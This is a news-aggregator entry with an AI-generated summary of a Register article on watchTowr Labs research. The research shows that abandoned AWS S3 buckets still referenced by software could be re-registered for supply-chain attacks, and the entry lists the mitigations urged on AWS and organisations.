Source URL: https://www.theregister.com/2025/02/04/abandoned_aws_s3/
Source: The Register
Title: Abandoned AWS S3 buckets can be reused in supply-chain attacks that would make SolarWinds look ‘insignificant’
Feedly Summary: When cloud customers don’t clean up after themselves, part 97
Abandoned AWS S3 buckets could be reused to hijack the global software supply chain in an attack that would make Russia’s “SolarWinds adventures look amateurish and insignificant," watchTowr Labs security researchers have claimed.…
AI Summary and Description: Yes
Summary: The article highlights a significant security risk associated with abandoned AWS S3 buckets, where researchers from watchTowr Labs discovered that these unsecured resources could potentially be used maliciously to compromise the software supply chain. By re-registering these buckets, they demonstrated how attackers could easily hijack them to deliver malicious software. The findings emphasize the urgency for better management and security practices around cloud infrastructure, particularly in preventing the reuse of bucket names.
Detailed Description:
The report from watchTowr Labs raises alarms about security vulnerabilities linked to abandoned AWS S3 storage buckets. This situation has far-reaching implications for organizations relying on cloud infrastructure for secure software delivery.
– **Key Findings:**
– Approximately 150 abandoned or expired AWS S3 buckets were found that were still referenced by applications and websites, indicating a significant risk if hijacked.
– These buckets had been associated with various entities, including government agencies, Fortune 500 companies, and tech organizations.
– Researchers spent funds to re-register these buckets, enabling them to track over eight million requests aimed at these resources, which included sensitive software and configurations.
– Incoming requests originated from notable organizations such as NASA, military networks, and major financial services, demonstrating the potential impact of exploiting these vulnerabilities.
– **Security Risks:**
– The risk underlying abandoned infrastructure extends beyond just S3 buckets. The report connects this issue to other research showing dangers from expired domains and accounts left unmanaged by businesses that shutter operations.
– Examples include abandoned single sign-on accounts that can be revived by malicious individuals who purchase expired domains, leading to unauthorized access.
– **Attack Feasibility:**
– The actions needed to exploit these buckets were described as “terrifyingly simple,” fostering concern about how easily attackers can repurpose abandoned buckets and compromise secure networks.
– Implementing checks to validate and authenticate software updates before acceptance is paramount; however, this isn’t universally practiced.
– **Industry Implications:**
– The study calls for improved protocols around the management of cloud resources, particularly ensuring buckets can’t be easily reused without audit or restriction.
– AWS has been urged to amend policies to prevent former bucket names from being reused, an approach identified by experts as a straightforward solution to mitigate risks.
– **Future Directions:**
– The findings prompt a reevaluation of security practices regarding abandoned cloud resources, advocating for more robust governance frameworks to prevent future vulnerabilities.
– Industry stakeholders are encouraged to adopt more stringent policies concerning the management of infrastructure lifecycles, especially amid an evolving threat landscape.
This research sheds light on urgent areas for improvement in cloud security practices and emphasizes the necessity of vigilance regarding the lifecycle management of digital infrastructure. Security and compliance professionals must address these risks promptly to protect the integrity of their networks and operations.